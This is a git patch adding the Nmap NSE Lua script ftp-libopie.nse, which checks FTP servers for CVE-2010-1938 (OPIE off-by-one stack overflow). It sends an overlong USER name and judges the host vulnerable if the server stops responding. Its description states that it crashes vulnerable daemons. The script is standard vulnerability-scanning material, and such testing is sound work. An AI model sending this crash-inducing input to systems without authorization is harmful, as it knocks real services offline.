From 0d47952611198ef6b1163f366dc03922d20b1475 Mon Sep 17 00:00:00 2001 From: Daniel Baumann Date: Wed, 17 Apr 2024 09:42:04 +0200 Subject: Adding upstream version 7.94+git20230807.3be01efb1+dfsg. Signed-off-by: Daniel Baumann --- scripts/ftp-libopie.nse | 101 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 scripts/ftp-libopie.nse (limited to 'scripts/ftp-libopie.nse') diff --git a/scripts/ftp-libopie.nse b/scripts/ftp-libopie.nse new file mode 100644 index 0000000..c5dfd14 --- /dev/null +++ b/scripts/ftp-libopie.nse @@ -0,0 +1,101 @@ +local nmap = require "nmap" +local shortport = require "shortport" +local string = require "string" +local vulns = require "vulns" + +description = [[ +Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), +a vulnerability discovered by Maksymilian Arciemowicz and Adam "pi3" Zabrocki. +See the advisory at https://nmap.org/r/fbsd-sa-opie. +Be advised that, if launched against a vulnerable host, this script will crash the FTPd. +]] + +--- +-- @output +-- PORT STATE SERVICE +-- 21/tcp open ftp +-- | ftp-libopie: +-- | VULNERABLE: +-- | OPIE off-by-one stack overflow +-- | State: LIKELY VULNERABLE +-- | IDs: CVE:CVE-2010-1938 BID:40403 +-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) +-- | Description: +-- | An off-by-one error in OPIE library 2.4.1-test1 and earlier, allows remote +-- | attackers to cause a denial of service or possibly execute arbitrary code +-- | via a long username. +-- | Disclosure date: 2010-05-27 +-- | References: +-- | http://site.pi3.com.pl/adv/libopie-adv.txt +-- | http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc +-- | https://www.securityfocus.com/bid/40403 +-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1938 +-- + + +author = "Ange Gutek" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"vuln","intrusive"} + + +portrule = shortport.port_or_service(21, "ftp") + +action = function(host, port) + local opie_vuln = { + title = "OPIE off-by-one stack overflow", + IDS = {CVE = 'CVE-2010-1938', BID = '40403'}, + risk_factor = "High", + scores = { + CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)", + }, + description = [[ +An off-by-one error in OPIE library 2.4.1-test1 and earlier, allows remote +attackers to cause a denial of service or possibly execute arbitrary code +via a long username.]], + references = { + 'http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc', + 'http://site.pi3.com.pl/adv/libopie-adv.txt', + }, + dates = { + disclosure = {year = '2010', month = '05', day = '27'}, + }, + } + + local report = vulns.Report:new(SCRIPT_NAME, host, port) + + local socket = nmap.new_socket() + local result + -- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory). + local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + local status = true + + local err_catch = function() + socket:close() + end + + local try = nmap.new_try(err_catch) + + socket:set_timeout(10000) + try(socket:connect(host, port)) + + -- First, try a safe User so that we are sure that everything is ok + local payload = "USER opie\r\n" + try(socket:send(payload)) + + status, result = socket:receive_lines(1); + if status and not (string.match(result,"^421")) then + + -- Second, try the vulnerable user account + local payload = "USER " .. user_account .. "\r\n" + try(socket:send(payload)) + + status, result = socket:receive_lines(1); + if status then + opie_vuln.state = vulns.STATE.NOT_VULN + else + -- if the server does not answer anymore we may have reached a stack overflow condition + opie_vuln.state = vulns.STATE.LIKELY_VULN + end + end + return report:make_output(opie_vuln) +end -- cgit v1.2.3